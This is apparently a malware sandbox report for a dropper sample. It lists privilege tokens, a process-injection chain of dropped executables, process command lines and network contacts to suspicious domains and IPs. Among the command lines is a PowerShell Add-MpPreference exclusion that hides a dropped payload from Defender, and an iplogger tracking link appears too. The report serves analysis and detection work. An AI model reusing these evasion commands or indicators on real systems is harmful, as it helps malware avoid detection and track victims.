N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe
PID 1812 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 4584 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe
PID 4584 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 3564 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe
PID 3564 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe
PID 3064 wrote to memory of 552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe
PID 3064 wrote to memory of 552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 4676 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 4676 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1608 -ip 1608

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 496

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1416 -ip 1416

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562933 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 356

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS5CA2.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5a6746f8,0x7ffc5a674708,0x7ffc5a674718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
N/A 127.0.0.1:63294 tcp
N/A 127.0.0.1:63296 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
